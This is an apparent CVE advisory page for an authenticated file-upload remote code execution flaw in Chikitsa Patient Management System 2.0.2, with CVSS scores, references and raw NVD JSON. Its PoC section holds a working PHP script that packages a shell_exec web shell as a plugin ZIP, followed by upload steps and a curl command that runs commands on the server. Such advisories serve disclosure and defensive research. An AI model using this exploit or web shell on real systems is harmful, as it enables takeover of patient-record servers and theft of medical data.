CVE-2021-47758

Description

Chikitsa Patient Management System 2.0.2 contains an authenticated remote code execution vulnerability that allows attackers to upload malicious PHP plugins through the module upload functionality. Authenticated attackers can generate and upload a ZIP plugin with a PHP backdoor that enables arbitrary command execution on the server through a weaponized PHP script.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:chikitsa:patient_management_system:2.0.2:*:*:*:*:*:*:* - VULNERABLE

Chikitsa Patient Management System 2.0.2

Chikitsa Patient Management System < 2.0.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<?php // Malicious plugin for CVE-2021-47758 - Chikitsa RCE // Author: [email protected] // Create malicious PHP backdoor $backdoor = '<?php\n'; $backdoor .= 'if(isset($_REQUEST["cmd"])){\n'; $backdoor .= ' $cmd = $_REQUEST["cmd"];\n'; $backdoor .= ' echo "<pre>";\n'; $backdoor .= ' $output = shell_exec($cmd);\n'; $backdoor .= ' echo $output;\n'; $backdoor .= ' echo "</pre>";\n'; $backdoor .= '}\n'; $backdoor .= '?>\n'; // Plugin configuration $plugin_json = json_encode([ 'name' => 'Malicious Plugin', 'version' => '1.0', 'description' => 'Evil module for CVE-2021-47758', 'author' => 'Attacker' ], JSON_PRETTY_PRINT); // Create ZIP archive $zip = new ZipArchive(); $zipFile = 'malicious_plugin.zip'; if ($zip->open($zipFile, ZipArchive::CREATE) === TRUE) { $zip->addFromString('plugin.json', $plugin_json); $zip->addFromString('module.php', $backdoor); $zip->close(); echo "PoC ZIP created: $zipFile\n"; } else { echo "Failed to create ZIP\n"; } /* Exploitation steps: 1. Login to Chikitsa PMS with low-privilege account 2. Navigate to Module Upload functionality 3. Upload the malicious_plugin.zip file 4. Access uploaded backdoor at: http://target/path/module.php?cmd=whoami 5. Execute arbitrary commands Example curl command: curl -X GET 'http://target/path/uploads/plugin_name/module.php?cmd=id' */

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47758
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47758
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47758/
[4] VulDB https://vuldb.com/cve/CVE-2021-47758
[5] https://github.com/sanskruti-technologies/chikitsa
[6] https://sourceforge.net/projects/chikitsa/
[7] https://www.chikitsa.io/
[8] https://www.exploit-db.com/exploits/50571

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47758", "sourceIdentifier": "[email protected]", "published": "2026-01-15T16:16:06.677", "lastModified": "2026-02-03T17:53:31.433", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Chikitsa Patient Management System 2.0.2 contains an authenticated remote code execution vulnerability that allows attackers to upload malicious PHP plugins through the module upload functionality. Authenticated attackers can generate and upload a ZIP plugin with a PHP backdoor that enables arbitrary command execution on the server through a weaponized PHP script."}, {"lang": "es", "value": "Chikitsa Patient Management System 2.0.2 contiene una vulnerabilidad de ejecución remota de código autenticada que permite a los atacantes subir plugins PHP maliciosos a través de la funcionalidad de carga de módulos. Los atacantes autenticados pueden generar y subir un plugin ZIP con una puerta trasera PHP que permite la ejecución arbitraria de comandos en el servidor a través de un script PHP armado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chikitsa:patient_management_system:2.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "8B5051D5-3E76-4B85-931A-332E8A59244F"}]}]}], "references": [{"url": "https://github.com/sanskruti-technologies/chikitsa", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://sourceforge.net/projects/chikitsa/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.chikitsa.io/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50571", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}]}}